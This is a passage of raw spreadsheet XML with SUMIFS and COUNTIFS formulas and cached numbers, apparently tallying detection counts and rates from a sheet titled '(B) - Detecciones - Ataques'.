        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>247</v>
      </c>
      <c r="AC50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>59</v>
      </c>
      <c r="AD50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>823</v>
      </c>
      <c r="AE50" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>47</v>
      </c>
      <c r="AF50" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6011</v>
      </c>
      <c r="AG50" s="271"/>
      <c r="AH50" s="352" t="s">
        <v>2502</v>
      </c>
      <c r="AI50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3705</v>
      </c>
      <c r="AJ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>7</v>
      </c>
      <c r="AL50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>110</v>
      </c>
      <c r="AR50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>7</v>
      </c>
      <c r="AS50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>12</v>
      </c>
      <c r="AV50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>27</v>
      </c>
      <c r="AY50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>3</v>
      </c>
      <c r="BA50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>14</v>
      </c>
      <c r="BB50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>53437</v>
      </c>
      <c r="BD50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>24</v>
      </c>
      <c r="BL50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>155160</v>
      </c>
      <c r="BN50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9175</v>
      </c>
      <c r="BO50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>10</v>
      </c>
      <c r="BT50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>133</v>
      </c>
      <c r="CA50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>3</v>
      </c>
      <c r="CI50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>33</v>
      </c>
      <c r="CJ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>171</v>
      </c>
      <c r="CN50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>13</v>
      </c>
      <c r="CP50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>43</v>
      </c>
      <c r="CQ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>804</v>
      </c>
      <c r="CT50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>10</v>
      </c>
      <c r="CY50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>475</v>
      </c>
      <c r="DI50" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5507</v>
      </c>
      <c r="DJ50" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EE3:$EE139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>15</v>
      </c>
      <c r="DK50" s="271"/>
      <c r="DO50" s="279"/>
      <c r="DP50" s="271"/>
      <c r="DQ50" s="271"/>
      <c r="DR50" s="271"/>
      <c r="DS50" s="271"/>
      <c r="DT50" s="271"/>
      <c r="DU50" s="271"/>
      <c r="DV50" s="271"/>
      <c r="DW50" s="271"/>
      <c r="DX50" s="271"/>
      <c r="DY50" s="271"/>
      <c r="DZ50" s="271"/>
      <c r="EA50" s="271"/>
      <c r="EB50" s="271"/>
      <c r="EC50" s="271"/>
      <c r="ED50" s="280"/>
      <c r="EG50" s="279"/>
      <c r="EH50" s="271"/>
      <c r="EI50" s="358" t="s">
        <v>2013</v>
      </c>
      <c r="EJ50" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S28 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK50" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S28 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EL50" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S28 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EM50" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S28 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EN50" s="360">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="EO50" s="364"/>
      <c r="EP50" s="459" t="s">
        <v>12</v>
      </c>
      <c r="EQ50" s="460" t="s">
        <v>12</v>
      </c>
      <c r="ER50" s="430" t="s">
        <v>12</v>
      </c>
      <c r="ES50" s="430" t="s">
        <v>12</v>
      </c>
      <c r="ET50" s="430" t="s">
        <v>12</v>
      </c>
      <c r="EU50" s="271"/>
      <c r="EV50" s="361" t="s">
        <v>2093</v>
      </c>
      <c r="EW50" s="461">
        <f t="shared" ref="EW50:EZ50" si="38">IF(EJ28=0,"-",EJ49/EJ28)</f>
        <v>0.25</v>
      </c>
      <c r="EX50" s="461">
        <f t="shared" si="38"/>
        <v>0.45</v>
      </c>
      <c r="EY50" s="461">
        <f t="shared" si="38"/>
        <v>0.3666666667</v>
      </c>
      <c r="EZ50" s="462">
        <f t="shared" si="38"/>
        <v>0.3469387755</v>
      </c>
      <c r="FA50" s="280"/>
      <c r="FK50" s="445"/>
      <c r="FL50" s="359"/>
      <c r="FM50" s="359"/>
      <c r="FN50" s="359"/>
      <c r="FO50" s="359"/>
      <c r="FP50" s="359"/>
      <c r="FY50" s="379" t="s">
        <v>951</v>
      </c>
      <c r="FZ50" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.001315789474</v>
      </c>
      <c r="GA50" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.1</v>
      </c>
      <c r="GC50" s="379" t="s">
        <v>951</v>
      </c>
      <c r="GD50" s="368">
